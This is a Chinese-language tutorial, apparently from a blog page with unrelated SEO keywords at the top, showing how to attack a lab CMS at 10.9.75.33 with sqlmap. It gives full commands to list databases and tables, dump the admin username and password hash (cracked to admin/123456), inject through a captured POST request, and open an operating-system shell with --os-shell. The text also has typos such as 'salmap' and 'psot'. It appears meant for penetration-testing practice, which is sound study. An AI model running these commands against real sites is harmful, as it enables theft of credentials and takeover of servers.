宁波网站建设 熊掌号,wordpress去掉,桂林哪里可以做网站,谈网站建设问的几个问题文章目录 利用sqlmap 注入得到cms网站后台管理员账密获取数据库名称获取cms数据库的表名获取users表中的字段#xff08;内容#xff09;获取username字段和password字段的内容 salmap破解psot请求数据包salmap获取getshell 利用sqlmap 注入得到cms网站后台管理员账密
获取数… 文章目录 利用sqlmap 注入得到cms网站后台管理员账密获取数据库名称获取cms数据库的表名获取users表中的字段内容获取username字段和password字段的内容 salmap破解psot请求数据包salmap获取getshell 利用sqlmap 注入得到cms网站后台管理员账密
获取数据库名称
在kali中输入sqlmap命令打开sqlmap然后输入下面命令
sqlmap -u http://10.9.75.33/cms/show.php?id33 --dbs --batch结果如下 获取cms数据库的表名
输入下面命令
sqlmap -u http://10.9.75.33/cms/show.php?id33 --dbs -D “cms” --tables --batch结果如下
得到cms中的所有表名 获取users表中的字段内容
输入下面命令
sqlmap -u http://10.9.75.33/cms/show.php?id33 -D “cms” -T “cms_users” --columns --batch结果如下users表中有三个字段 获取username字段和password字段的内容
即获取账号密码输入下面命令
sqlmap -u http://10.9.75.33/cms/show.php?id33 -D cms -T cms_users -C username,password --dump在弹出的两次交互信息中输入n得到账号和md5密码密文 口算md5密文其实是用工具解密得到用户名和密码 admin 123456 salmap破解psot请求数据包
在后台网页用火狐代理、bp抓包在http history中查看抓到的数据包将抓到的post请求包复制 输入下面命令在tmp目录下新建一个txt文件并用vim编辑器编辑将post数据包的内容放入txt文件中
touch /tmp/post.txtvim /tmp/post.txt命令模式下保存退出
输入下面命令破解post请求包
salmap -r /tmp/post.txt在交互式命令时回车是否追踪302输入no 耐心等待完成显示了两种注入方法报错注入和布尔盲注 爆破密码
sqlmap -r /tmp/post.txt -D cms -T cms_users -C username,password --dump爆破成功 salmap获取getshell
在kali控制台输入下面命令
sqlmap -u http://10.9.75.33/cms/show.php?id33 --os-shell选择语言
选择路径2是自选路径选择2 路径填
c:/phpstudy/www/获取成功
